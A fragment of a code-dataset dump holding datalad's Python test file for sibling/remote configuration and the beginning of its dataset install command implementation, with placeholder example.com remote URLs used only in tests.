86, "num_lines": 603, "path": "/datalad/distribution/tests/test_siblings.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test adding sibling(s) to a dataset\n\n\"\"\"\n\nfrom datalad.api import (\n Dataset,\n clone,\n create,\n install,\n siblings,\n)\nfrom datalad.support.exceptions import InsufficientArgumentsError\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.path import basename\nfrom datalad.support.path import join as opj\nfrom datalad.support.path import (\n normpath,\n relpath,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n assert_false,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_result_count,\n assert_status,\n chpwd,\n create_tree,\n eq_,\n ok_,\n on_appveyor,\n serve_path_via_http,\n with_sameas_remote,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n on_windows,\n)\n\nimport pytest\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_siblings(origin=None, repo_path=None, local_clone_path=None):\n ca = dict(result_renderer='disabled')\n # a remote dataset with a subdataset underneath\n origds = Dataset(origin).create(**ca)\n _ = origds.create('subm 1', **ca)\n\n sshurl = \"ssh://push-remote.example.com\"\n httpurl1 = \"http://remote1.example.com/location\"\n httpurl2 = \"http://remote2.example.com/location\"\n\n # insufficient arguments\n # we need a dataset to work at\n with chpwd(repo_path): # not yet there\n assert_raises(InsufficientArgumentsError,\n siblings, 'add', url=httpurl1, **ca)\n\n # prepare src\n source = install(repo_path, source=origin, recursive=True, **ca)\n # pollute config\n depvar = 'remote.test-remote.datalad-publish-depends'\n source.config.add(depvar, 'stupid', scope='local')\n\n # cannot configure unknown remotes as dependencies\n res = siblings(\n 'configure',\n dataset=source,\n name=\"test-remote\",\n url=httpurl1,\n publish_depends=['r1', 'r2'],\n on_failure='ignore',\n **ca)\n assert_status('error', res)\n eq_(res[0]['message'],\n ('unknown sibling(s) specified as publication dependency: %s',\n set(('r1', 'r2'))))\n # prior config was not changed by failed call above\n eq_(source.config.get(depvar, None), 'stupid')\n\n res = siblings('configure',\n dataset=source, name=\"test-remote\",\n url=httpurl1,\n result_xfm='paths',\n **ca)\n\n eq_(res, [source.path])\n assert_in(\"test-remote\", source.repo.get_remotes())\n eq_(httpurl1,\n source.repo.get_remote_url(\"test-remote\"))\n\n # reconfiguring doesn't change anything\n siblings('configure', dataset=source, name=\"test-remote\",\n url=httpurl1, **ca)\n assert_in(\"test-remote\", source.repo.get_remotes())\n eq_(httpurl1,\n source.repo.get_remote_url(\"test-remote\"))\n # re-adding doesn't work\n res = siblings('add', dataset=source, name=\"test-remote\",\n url=httpurl1, on_failure='ignore', **ca)\n assert_status('error', res)\n # only after removal\n res = siblings('remove', dataset=source, name=\"test-remote\", **ca)\n assert_status('ok', res)\n assert_not_in(\"test-remote\", source.repo.get_remotes())\n # remove again (with result renderer to smoke-test a renderer\n # special case for this too)\n res = siblings('remove', dataset=source, name=\"test-remote\", **ca)\n assert_status('notneeded', res)\n\n res = siblings('add', dataset=source, name=\"test-remote\",\n url=httpurl1, on_failure='ignore', **ca)\n assert_status('ok', res)\n\n # add another remove with a publication dependency\n # again pre-pollute config\n depvar = 'remote.test-remote2.datalad-publish-depends'\n pushvar = 'remote.test-remote2.push'\n source.config.add(depvar, 'stupid', scope='local')\n source.config.add(pushvar, 'senseless', scope='local')\n res = siblings('configure', dataset=source, name=\"test-remote2\",\n url=httpurl2, on_failure='ignore',\n publish_depends='test-remote',\n # just for smoke testing\n publish_by_default=DEFAULT_BRANCH,\n **ca)\n assert_status('ok', res)\n # config replaced with new setup\n #source.config.reload(force=True)\n eq_(source.config.get(depvar, None), 'test-remote')\n eq_(source.config.get(pushvar, None), DEFAULT_BRANCH)\n\n # add to another remote automagically taking it from the url\n # and being in the dataset directory\n with chpwd(source.path):\n res = siblings('add', url=httpurl2, **ca)\n assert_result_count(\n res, 1,\n name=\"remote2.example.com\", type='sibling')\n assert_in(\"remote2.example.com\", source.repo.get_remotes())\n\n # don't fail with conflicting url, when using force:\n res = siblings('configure',\n dataset=source, name=\"test-remote\",\n url=httpurl1 + \"/elsewhere\",\n **ca)\n assert_status('ok', res)\n eq_(httpurl1 + \"/elsewhere\",\n source.repo.get_remote_url(\"test-remote\"))\n\n # no longer a use case, I would need additional convincing that\n # this is anyhow useful other then triple checking other peoples\n # errors. for an actual check use 'query'\n # maybe it could be turned into a set of warnings when `configure`\n # alters an existing setting, but then why call configure, if you\n # want to keep the old values\n #with assert_raises(RuntimeError) as cm:\n # add_sibling(dataset=source, name=\"test-remote\",\n # url=httpurl1 + \"/elsewhere\")\n #assert_in(\"\"\"'test-remote' already exists with conflicting settings\"\"\",\n # str(cm.value))\n ## add a push url without force fails, since in a way the fetch url is the\n ## configured push url, too, in that case:\n #with assert_raises(RuntimeError) as cm:\n # add_sibling(dataset=source, name=\"test-remote\",\n # url=httpurl1 + \"/elsewhere\",\n # pushurl=sshurl, force=False)\n #assert_in(\"\"\"'test-remote' already exists with conflicting settings\"\"\",\n # str(cm.value))\n\n # add push url (force):\n res = siblings('configure',\n dataset=source, name=\"test-remote\",\n url=httpurl1 + \"/elsewhere\",\n pushurl=sshurl,\n **ca)\n assert_status('ok', res)\n eq_(httpurl1 + \"/elsewhere\",\n source.repo.get_remote_url(\"test-remote\"))\n eq_(sshurl,\n source.repo.get_remote_url(\"test-remote\", push=True))\n\n # recursively:\n for r in siblings(\n 'configure',\n dataset=source, name=\"test-remote\",\n url=httpurl1 + \"/%NAME\",\n pushurl=sshurl + \"/%NAME\",\n recursive=True,\n # we need to disable annex queries, as it will try to access\n # the fake URL configured above\n get_annex_info=False,\n **ca):\n repo = GitRepo(r['path'], create=False)\n assert_in(\"test-remote\", repo.get_remotes())\n url = repo.get_remote_url(\"test-remote\")\n pushurl = repo.get_remote_url(\"test-remote\", push=True)\n ok_(url.startswith(httpurl1 + '/' + basename(source.path)))\n ok_(url.endswith(basename(repo.path)))\n ok_(pushurl.startswith(sshurl + '/' + basename(source.path)))\n ok_(pushurl.endswith(basename(repo.path)))\n eq_(url, r['url'])\n eq_(pushurl, r['pushurl'])\n\n # recursively without template:\n for r in siblings(\n 'configure',\n dataset=source, name=\"test-remote-2\",\n url=httpurl1,\n pushurl=sshurl,\n recursive=True,\n # we need to disable annex queries, as it will try to access\n # the fake URL configured above\n get_annex_info=False,\n **ca):\n repo = GitRepo(r['path'], create=False)\n assert_in(\"test-remote-2\", repo.get_remotes())\n url = repo.get_remote_url(\"test-remote-2\")\n pushurl = repo.get_remote_url(\"test-remote-2\", push=True)\n ok_(url.startswith(httpurl1))\n ok_(pushurl.startswith(sshurl))\n # FIXME: next condition used to compare the *Repo objects instead of\n # there paths. Due to missing annex-init in\n # datalad/tests/utils.py:clone_url this might not be the same, since\n # `source` actually is an annex, but after flavor 'clone' in\n # `with_testrepos` and then `install` any trace of an annex might be\n # gone in v5 (branch 'master' only), while in direct mode it still is\n # considered an annex. `repo` is forced to be a `GitRepo`, so we might\n # compare two objects of different classes while they actually are\n # pointing to the same repository.\n # See github issue #1854\n if repo.path != source.repo.path:\n ok_(url.endswith('/' + basename(repo.path)))\n ok_(pushurl.endswith(basename(repo.path)))\n eq_(url, r['url'])\n eq_(pushurl, r['pushurl'])\n\n # recursively without template and pushurl but full \"hierarchy\"\n # to a local clone\n for r in siblings(\n 'configure',\n dataset=source,\n name=\"test-remote-3\",\n url=local_clone_path,\n recursive=True,\n # we need to disable annex queries, as it will try to access\n # the fake URL configured above\n get_annex_info=False,\n **ca):\n repo = GitRepo(r['path'], create=False)\n assert_in(\"test-remote-3\", repo.get_remotes())\n url = repo.get_remote_url(\"test-remote-3\")\n pushurl = repo.get_remote_url(\"test-remote-3\", push=True)\n\n eq_(normpath(url),\n normpath(opj(local_clone_path,\n relpath(str(r['path']), source.path))))\n # https://github.com/datalad/datalad/issues/3951\n ok_(not pushurl) # no pushurl should be defined\n # 5621: Users shouldn't pass identical names for remote & common data source\n assert_raises(ValueError, siblings, 'add', dataset=source, name='howdy',\n url=httpurl1, as_common_datasrc='howdy')\n\n\n@with_tempfile(mkdir=True)\ndef test_here(path=None):\n # few smoke tests regarding the 'here' sibling\n ds = create(path)\n res = ds.siblings(\n 'query',\n on_failure='ignore',\n result_renderer='disabled')\n assert_status('ok', res)\n assert_result_count(res, 1)\n assert_result_count(res, 1, name='here')\n here = res[0]\n eq_(ds.repo.uuid, here['annex-uuid'])\n assert_in('annex-description', here)\n assert_in('annex-bare', here)\n assert_in('available_local_disk_space', here)\n\n # unknown sibling query errors\n res = ds.siblings(\n 'query',\n name='notthere',\n on_failure='ignore',\n result_renderer='disabled')\n assert_status('error', res)\n\n # set a description\n res = ds.siblings(\n 'configure',\n name='here',\n description='very special',\n on_failure='ignore',\n result_renderer='disabled')\n assert_status('ok', res)\n assert_result_count(res, 1)\n assert_result_count(res, 1, name='here')\n here = res[0]\n eq_('very special', here['annex-description'])\n\n # does not die when here is dead\n res = ds.siblings('query', name='here', return_type='item-or-list')\n # gone when dead\n res.pop('annex-description', None)\n # volatile prop\n res.pop('available_local_disk_space', None)\n ds.repo.call_annex(['dead', 'here'])\n newres = ds.siblings('query', name='here', return_type='item-or-list')\n newres.pop('available_local_disk_space', None)\n eq_(res, newres)\n\n\n@with_tempfile(mkdir=True)\ndef test_no_annex(path=None):\n # few smoke tests regarding the 'here' sibling\n ds = create(path, annex=False)\n res = ds.siblings(\n 'configure',\n name='here',\n description='very special',\n on_failure='ignore',\n result_renderer='disabled')\n assert_status('impossible', res)\n\n res = ds.siblings(\n 'enable',\n name='doesnotmatter',\n on_failure='ignore',\n result_renderer='disabled')\n assert_in_results(\n res, status='impossible',\n message='cannot enable sibling of non-annex dataset')\n\n\n@with_tempfile()\n@with_tempfile()\ndef test_arg_missing(path=None, path2=None):\n # test fix for gh-3553\n ds = create(path)\n assert_raises(\n InsufficientArgumentsError,\n ds.siblings,\n 'add',\n url=path2,\n )\n assert_status(\n 'ok',\n ds.siblings(\n 'add', url=path2, name='somename'))\n # trigger some name guessing functionality that will still not\n # being able to end up using a hostnames-spec despite being\n # given a URL\n if not on_windows:\n # the trick with the file:// URL creation only works on POSIX\n # the underlying tested code here is not about paths, though,\n # so it is good enough to run this on POSIX system to be\n # reasonably sure that things work\n assert_raises(\n InsufficientArgumentsError,\n ds.siblings,\n 'add',\n url=f'file://{path2}',\n )\n\n # there is no name guessing with 'configure'\n assert_in_results(\n ds.siblings('configure', url='http://somename', on_failure='ignore'),\n status='error',\n message='need sibling `name` for configuration')\n\n # needs a URL\n assert_raises(\n InsufficientArgumentsError, ds.siblings, 'add', name='somename')\n # just pushurl is OK\n assert_status('ok', ds.siblings('add', pushurl=path2, name='somename2'))\n\n # needs group with groupwanted\n assert_raises(\n InsufficientArgumentsError,\n ds.siblings, 'add', url=path2, name='somename',\n annex_groupwanted='whatever')\n\n\n@with_sameas_remote\n@with_tempfile(mkdir=True)\ndef test_sibling_enable_sameas(repo=None, clone_path=None):\n ds = Dataset(repo.path)\n create_tree(ds.path, {\"f0\": \"0\"})\n ds.save(path=\"f0\")\n ds.push([\"f0\"], to=\"r_dir\")\n ds.repo.drop([\"f0\"])\n\n ds_cloned = clone(ds.path, clone_path)\n\n assert_false(ds_cloned.repo.file_has_content(\"f0\"))\n # does not work without a name\n res = ds_cloned.siblings(\n action=\"enable\",\n result_renderer='disabled',\n on_failure='ignore',\n )\n assert_in_results(\n res, status='error', message='require `name` of sibling to enable')\n # does not work with the wrong name\n res = ds_cloned.siblings(\n action=\"enable\",\n name='wrong',\n result_renderer='disabled',\n on_failure='ignore',\n )\n assert_in_results(\n res, status='impossible',\n message=(\"cannot enable sibling '%s', not known\", 'wrong')\n )\n # works with the right name\n res = ds_cloned.siblings(action=\"enable\", name=\"r_rsync\")\n assert_status(\"ok\", res)\n ds_cloned.get(path=[\"f0\"])\n ok_(ds_cloned.repo.file_has_content(\"f0\"))\n\n\n@with_tempfile(mkdir=True)\ndef test_sibling_inherit(basedir=None):\n ds_source = Dataset(opj(basedir, \"source\")).create()\n\n # In superdataset, set up remote \"source\" that has git-annex group \"grp\".\n ds_super = Dataset(opj(basedir, \"super\")).create()\n ds_super.siblings(action=\"add\", name=\"source\", url=ds_source.path,\n annex_group=\"grp\", result_renderer='disabled')\n\n ds_clone = ds_super.clone(\n source=ds_source.path, path=\"clone\")\n # In a subdataset, adding a \"source\" sibling with inherit=True pulls in\n # that configuration.\n ds_clone.siblings(action=\"add\", name=\"source\", url=ds_source.path,\n inherit=True, result_renderer='disabled')\n res = ds_clone.siblings(action=\"query\", name=\"source\",\n result_renderer='disabled')\n eq_(res[0][\"annex-group\"], \"grp\")\n\n\n@with_tempfile(mkdir=True)\ndef test_sibling_inherit_no_super_remote(basedir=None):\n ds_source = Dataset(opj(basedir, \"source\")).create()\n ds_super = Dataset(opj(basedir, \"super\")).create()\n ds_clone = ds_super.clone(\n source=ds_source.path, path=\"clone\")\n # Adding a sibling with inherit=True doesn't crash when the superdataset\n # doesn't have a remote `name`.\n ds_clone.siblings(action=\"add\", name=\"donotexist\", inherit=True,\n url=ds_source.path, result_renderer='disabled')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_sibling_path_is_posix(basedir=None, otherpath=None):\n ds_source = Dataset(opj(basedir, \"source\")).create()\n # add remote with system native path\n ds_source.siblings(\n action=\"add\",\n name=\"donotexist\",\n url=otherpath,\n result_renderer='disabled')\n res = ds_source.siblings(\n action=\"query\",\n name=\"donotexist\",\n result_renderer='disabled',\n return_type='item-or-list')\n # path URL should come out POSIX as if `git clone` had configured it for origin\n # https://github.com/datalad/datalad/issues/3972\n eq_(res['url'], Path(otherpath).as_posix())\n\n\n@with_tempfile()\ndef test_bf3733(path=None):\n ds = create(path)\n # call siblings configure for an unknown sibling without a URL\n # doesn't work, but also doesn't crash\n assert_result_count(\n ds.siblings(\n 'configure',\n name='imaginary',\n publish_depends='doesntmatter',\n url=None,\n on_failure='ignore'),\n 1,\n status='error',\n action=\"configure-sibling\",\n name=\"imaginary\",\n path=ds.path,\n )\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@serve_path_via_http\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_as_common_datasource(testbed=None, viapath=None, viaurl=None,\n remotepath=None, url=None, remotepath2=None, url2=None):\n ds = Dataset(remotepath).create()\n (ds.pathobj / 'testfile').write_text('likemagic')\n (ds.pathobj / 'testfile2').write_text('likemagic2')\n ds.save()\n\n # make clonable via HTTP\n ds.repo.call_git(['update-server-info'])\n\n # populate location of the 2nd url, so we have two remotes with different UUIDs\n ds2 = clone(source=remotepath, path=remotepath2)\n ds2.get('testfile')\n ds2.repo.call_git(['update-server-info'])\n\n # this does not work for remotes that have path URLs\n ds_frompath = clone(source=remotepath, path=viapath)\n res = ds_frompath.siblings(\n 'configure',\n name=DEFAULT_REMOTE,\n as_common_datasrc='mike',\n on_failure='ignore',\n result_renderer='disabled',\n )\n assert_in_results(\n res,\n status='impossible',\n message='cannot configure as a common data source, URL protocol '\n 'is not http or https',\n )\n\n # but it works for HTTP\n ds_fromurl = clone(source=url, path=viaurl)\n res = ds_fromurl.siblings(\n 'configure',\n name=DEFAULT_REMOTE,\n as_common_datasrc='mike2',\n result_renderer='disabled',\n )\n assert_status('ok', res)\n\n # same thing should be possible by adding a fresh remote\n # We need to do it on a different URL since some versions of git-annex\n # such as 10.20220322-1~ndall+1 might refuse operate with multiple remotes\n # with identical URLs, and otherwise just reuse the same UUID/remote\n res = ds_fromurl.siblings(\n 'add',\n name='fresh',\n # we must amend the URL given by serve_path_via_http, because\n # we are serving the root of a non-bare repository, but git-annex\n # needs to talk to its .git (git-clone would also not eat\n # `url` unmodified).\n url=url2 + '.git',\n as_common_datasrc='fresh-sr',\n result_renderer='disabled',\n )\n assert_status('ok', res)\n\n # now try if it works. we will clone the clone, and get a repo that does\n # not know its ultimate origin. still, we should be able to pull data\n # from it via the special remote\n testbed = clone(source=ds_fromurl, path=testbed)\n assert_status('ok', testbed.get('testfile'))\n eq_('likemagic', (testbed.pathobj / 'testfile').read_text())\n # and the other one\n assert_status('ok', testbed.get('testfile2'))\n\n # Let's get explicitly from both remotes which would not work if URL\n # above is wrong or one of the remotes not autoenabled\n for remote in 'mike2', 'fresh-sr':\n assert_status('ok', testbed.drop('testfile'))\n assert_status('ok', testbed.get('testfile', source=remote))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_specialremote(dspath=None, remotepath=None):\n ds = Dataset(dspath).create()\n ds.repo.call_annex(\n ['initremote', 'myremote', 'type=directory',\n f'directory={remotepath}', 'encryption=none'])\n res = ds.siblings('query', result_renderer='disabled')\n assert_in_results(\n res,\n **{'name': 'myremote',\n 'annex-type': 'directory',\n 'annex-directory': remotepath})\n" }, { "alpha_fraction": 0.5746340155601501, "alphanum_fraction": 0.5758093595504761, "avg_line_length": 42.6317024230957, "blob_id": "47b74c4ead81cc5b9a99f822344a0eee8aa9dce7", "content_id": "cf5ce37b7d30823309c98e97da16d0c54e5a7d2c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18718, "license_type": "permissive", "max_line_length": 91, "num_lines": 429, "path": "/datalad/distribution/install.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for dataset (component) installation\n\n\"\"\"\n\nimport logging\nfrom os import curdir\n\nfrom datalad.interface.base import Interface\nfrom datalad.interface.common_opts import (\n recursion_flag,\n recursion_limit,\n location_description,\n jobs_opt,\n reckless_opt,\n)\nfrom datalad.interface.results import (\n get_status_dict,\n YieldDatasets,\n is_result_matching_pathsource_argument,\n)\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.support.constraints import (\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n InsufficientArgumentsError,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.support.network import (\n RI,\n PathRI,\n)\nfrom datalad.utils import ensure_list\n\nfrom datalad.distribution.dataset import (\n datasetmethod,\n resolve_path,\n require_dataset,\n EnsureDataset,\n)\nfrom datalad.distribution.get import Get\nfrom datalad.core.distributed.clone import Clone\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.distribution.install')\n\n\n@build_doc\nclass Install(Interface):\n \"\"\"Install one or many datasets from remote URL(s) or local PATH source(s).\n\n This command creates local :term:`sibling`\\(s) of existing dataset(s) from\n (remote) locations specified as URL(s) or path(s). Optional recursion into\n potential subdatasets, and download of all referenced data is supported.\n The new dataset(s) can be optionally registered in an existing\n :term:`superdataset` by identifying it via the `dataset` argument (the new\n dataset's path needs to be located within the superdataset for that).\n\n || REFLOW >>\n If no explicit [CMD: -s|--source CMD][PY: `source` PY] option is specified,\n then all positional URL-OR-PATH\n arguments are considered to be \"sources\" if they are URLs or target locations\n if they are paths.\n If a target location path corresponds to a submodule, the source location for it\n is figured out from its record in the `.gitmodules`.\n If [CMD: -s|--source CMD][PY: `source` PY] is specified, then a single optional\n positional PATH would be taken as the destination path for that dataset.\n << REFLOW ||\n\n It is possible to provide a brief description to label the dataset's\n nature *and* location, e.g. \"Michael's music on black laptop\". This helps\n humans to identify data locations in distributed scenarios. By default an\n identifier comprised of user and machine name, plus path will be generated.\n\n When only partial dataset content shall be obtained, it is recommended to\n use this command without the `get-data` flag, followed by a\n :func:`~datalad.api.get` operation to obtain the desired data.\n\n .. note::\n Power-user info: This command uses :command:`git clone`, and\n :command:`git annex init` to prepare the dataset. Registering to a\n superdataset is performed via a :command:`git submodule add` operation\n in the discovered superdataset.\n \"\"\"\n\n # very frequently this command will yield exactly one installed dataset\n # spare people the pain of going through a list by default\n return_type = 'item-or-list'\n # as discussed in #1409 and #1470, we want to return dataset instances\n # matching what is actually available after command completion (and\n # None for any failed dataset installation)\n # TODO actually need success(containing)dataset-or-none\n result_xfm = 'successdatasets-or-none'\n # we also want to limit the returned result to explicit input arguments\n # (paths/source) and not report any implicit action, like intermediate\n # datasets\n result_filter = is_result_matching_pathsource_argument\n\n _examples_ = [\n dict(text=\"Install a dataset from GitHub into the current directory\",\n code_py=\"install(\"\n \"source='https://github.com/datalad-datasets/longnow\"\n \"-podcasts.git')\",\n code_cmd=\"datalad install \"\n \"https://github.com/datalad-datasets/longnow-podcasts.git\"),\n dict(text=\"Install a dataset as a subdataset into the current dataset\",\n code_py=\"\"\"\\\n install(dataset='.',\n source='https://github.com/datalad-datasets/longnow-podcasts.git')\"\"\",\n code_cmd=\"\"\"\\\n datalad install -d . \\\\\n --source='https://github.com/datalad-datasets/longnow-podcasts.git'\"\"\"),\n dict(text=\"Install a dataset into 'podcasts' (not 'longnow-podcasts') directory,\"\n \" and get all content right away\",\n code_py=\"\"\"\\\n install(path='podcasts',\n source='https://github.com/datalad-datasets/longnow-podcasts.git',\n get_data=True)\"\"\",\n code_cmd=\"\"\"\\\n datalad install --get-data \\\\\n -s https://github.com/datalad-datasets/longnow-podcasts.git podcasts\"\"\"),\n dict(text=\"Install a dataset with all its subdatasets\",\n code_py=\"\"\"\\\n install(source='https://github.com/datalad-datasets/longnow-podcasts.git',\n recursive=True)\"\"\",\n code_cmd=\"\"\"\\\n datalad install -r \\\\\n https://github.com/datalad-datasets/longnow-podcasts.git\"\"\"),\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n # TODO: this probably changes to install into the dataset (add_to_super)\n # and to install the thing 'just there' without operating 'on' a dataset.\n # Adapt doc.\n # MIH: `shouldn't this be the job of `add`?\n doc=\"\"\"specify the dataset to perform the install operation on. If\n no dataset is given, an attempt is made to identify the dataset\n in a parent directory of the current working directory and/or the\n `path` given\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar='URL-OR-PATH',\n nargs=\"*\",\n # doc: TODO\n doc=\"\"\"path/name of the installation target. If no `path` is\n provided a destination path will be derived from a source URL\n similar to :command:`git clone`\"\"\"),\n source=Parameter(\n args=(\"-s\", \"--source\"),\n metavar='URL-OR-PATH',\n doc=\"URL or local path of the installation source\",\n constraints=EnsureStr() | EnsureNone()),\n branch=Parameter(\n args=(\"--branch\",),\n doc=\"\"\"Clone source at this branch or tag. This option applies only\n to the top-level dataset not any subdatasets that may be cloned\n when installing recursively. Note that if the source is a RIA URL\n with a version, it takes precedence over this option.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n get_data=Parameter(\n args=(\"-g\", \"--get-data\",),\n doc=\"\"\"if given, obtain all data content too\"\"\",\n action=\"store_true\"),\n description=location_description,\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n reckless=reckless_opt,\n jobs=jobs_opt,\n )\n\n @staticmethod\n @datasetmethod(name='install')\n @eval_results\n def __call__(\n path=None,\n *,\n source=None,\n dataset=None,\n get_data=False,\n description=None,\n recursive=False,\n recursion_limit=None,\n reckless=None,\n jobs=\"auto\",\n branch=None):\n\n # normalize path argument to be equal when called from cmdline and\n # python and nothing was passed into `path`\n path = ensure_list(path)\n\n if not source and not path:\n raise InsufficientArgumentsError(\n \"Please provide at least a source or a path\")\n\n # Common kwargs to pass to underlying git/install calls.\n # They might need adjustments (e.g. for recursion_limit, but\n # otherwise would be applicable throughout\n #\n # There should have been more of common options!\n # since underneath get could do similar installs\n common_kwargs = dict(\n get_data=get_data,\n recursive=recursive,\n recursion_limit=recursion_limit,\n # git_opts=git_opts,\n # annex_opts=annex_opts,\n reckless=reckless,\n jobs=jobs,\n )\n\n # did we explicitly get a dataset to install into?\n # if we got a dataset, path will be resolved against it.\n # Otherwise path will be resolved first.\n ds = None\n if dataset is not None:\n ds = require_dataset(dataset, check_installed=True,\n purpose='install')\n common_kwargs['dataset'] = dataset\n # pre-compute for results below\n refds_path = ds if ds is None else ds.path\n\n # switch into the two scenarios without --source:\n # 1. list of URLs\n # 2. list of (sub)dataset content\n if source is None:\n # we need to collect URLs and paths\n to_install = []\n to_get = []\n # TODO: this approach is problematic, it disrupts the order of input args.\n # consequently results will be returned in an unexpected order when a\n # mixture of source URL and paths is given. Reordering is only possible when\n # everything in here is fully processed before any results can be yielded.\n # moreover, I think the semantics of the status quo implementation are a\n # bit complicated: in a mixture list a source URL will lead to a new dataset\n # at a generated default location, but a path will lead to a subdataset\n # at that exact location\n for urlpath in path:\n ri = RI(urlpath)\n (to_get if isinstance(ri, PathRI) else to_install).append(urlpath)\n\n # 1. multiple source URLs\n for s in to_install:\n lgr.debug(\"Install passes into install source=%s\", s)\n for r in Install.__call__(\n source=s,\n description=description,\n # we need to disable error handling in order to have it done at\n # the very top, otherwise we are not able to order a global\n # \"ignore-and-keep-going\"\n on_failure='ignore',\n return_type='generator',\n result_renderer='disabled',\n result_xfm=None,\n result_filter=None,\n branch=branch,\n **common_kwargs):\n # no post-processing of the installed content on disk\n # should be necessary here, all done by code further\n # down that deals with an install from an actual `source`\n # any necessary fixes should go there too!\n r['refds'] = refds_path\n yield r\n\n # 2. one or more dataset content paths\n if to_get:\n lgr.debug(\"Install passes into get %d items\", len(to_get))\n # all commented out hint on inability to pass those options\n # into underlying install-related calls.\n # Also need to pass from get:\n # annex_get_opts\n\n for r in Get.__call__(\n to_get,\n # TODO should pass-through description, not sure why disabled\n # description=description,\n # we need to disable error handling in order to have it done at\n # the very top, otherwise we are not able to order a global\n # \"ignore-and-keep-going\"\n on_failure='ignore',\n return_type='generator',\n result_xfm=None,\n result_renderer='disabled',\n result_filter=None,\n **common_kwargs):\n # no post-processing of get'ed content on disk should be\n # necessary here, this is the responsibility of `get`\n # (incl. adjusting parent's gitmodules when submodules end\n # up in an \"updated\" state (done in get helpers)\n # any required fixes should go there!\n r['refds'] = refds_path\n yield r\n\n # we are done here\n # the rest is about install from a `source`\n return\n\n # an actual `source` was given\n if source and path and len(path) > 1:\n # exception is ok here, if this fails it is either direct user error\n # or we fucked up one of our internal calls\n raise ValueError(\n \"install needs a single PATH when source is provided. \"\n \"Was given multiple PATHs: %s\" % str(path))\n\n # parameter constraints:\n if not source:\n # exception is ok here, if this fails it is either direct user error\n # or we fucked up one of our internal calls\n raise InsufficientArgumentsError(\n \"a `source` is required for installation\")\n\n # code below deals with a single path only\n path = path[0] if path else None\n\n if source == path:\n # even if they turn out to be identical after resolving symlinks\n # and more sophisticated witchcraft, it would still happily say\n # \"it appears to be already installed\", so we just catch an\n # obviously pointless input combination\n yield get_status_dict(\n 'install', path=path, status='impossible', logger=lgr,\n source_url=source, refds=refds_path,\n message=\"installation `source` and destination `path` are identical. \"\n \"If you are trying to add a subdataset simply use the `save` command\")\n return\n\n # resolve the target location (if local) against the provided dataset\n # or CWD:\n if path is not None:\n # MIH everything in here is highly similar to what common\n # interface helpers do (or should/could do), but at the same\n # is very much tailored to just apply to `install` -- I guess\n # it has to stay special\n\n # Should work out just fine for regular paths, so no additional\n # conditioning is necessary\n try:\n path_ri = RI(path)\n except Exception as e:\n ce = CapturedException(e)\n raise ValueError(\n \"invalid path argument {}: ({})\".format(path, ce))\n try:\n # Wouldn't work for SSHRI ATM, see TODO within SSHRI\n # yoh: path should be a local path, and mapping note within\n # SSHRI about mapping localhost:path to path is kinda\n # a peculiar use-case IMHO\n # TODO Stringification can be removed once PY35 is no longer\n # supported\n path = str(resolve_path(path_ri.localpath, dataset))\n # any `path` argument that point to something local now\n # resolved and is no longer a URL\n except ValueError:\n # `path` is neither a valid source nor a local path.\n # TODO: The only thing left is a known subdataset with a\n # name, that is not a path; Once we correctly distinguish\n # between path and name of a submodule, we need to consider\n # this.\n # For now: Just raise\n raise ValueError(\"Invalid path argument {0}\".format(path))\n # `path` resolved, if there was any.\n\n # clone dataset, will also take care of adding to superdataset, if one\n # is given\n res = Clone.__call__(\n source, path, dataset=ds, description=description,\n reckless=reckless,\n git_clone_opts=[\"--branch=\" + branch] if branch else None,\n # we need to disable error handling in order to have it done at\n # the very top, otherwise we are not able to order a global\n # \"ignore-and-keep-going\"\n result_xfm=None,\n return_type='generator',\n result_renderer='disabled',\n result_filter=None,\n on_failure='ignore')\n # helper\n as_ds = YieldDatasets()\n destination_dataset = None\n for r in res:\n if r['action'] == 'install' and r['type'] == 'dataset':\n # make sure logic below is valid, only one dataset result is\n # coming back\n assert(destination_dataset is None)\n destination_dataset = as_ds(r)\n r['refds'] = refds_path\n yield r\n assert(destination_dataset)\n\n # Now, recursive calls:\n if recursive or get_data:\n # dataset argument must not be passed inside since we use bound .get\n # It is ok to do \"inplace\" as long as we still return right\n # after the loop ends\n common_kwargs.pop('dataset', '')\n for r in destination_dataset.get(\n curdir,\n description=description,\n # we need to disable error handling in order to have it done at\n # the very top, otherwise we are not able to order a global\n # \"ignore-and-keep-going\"\n on_failure='ignore',\n return_type='generator',\n result_xfm=None,\n 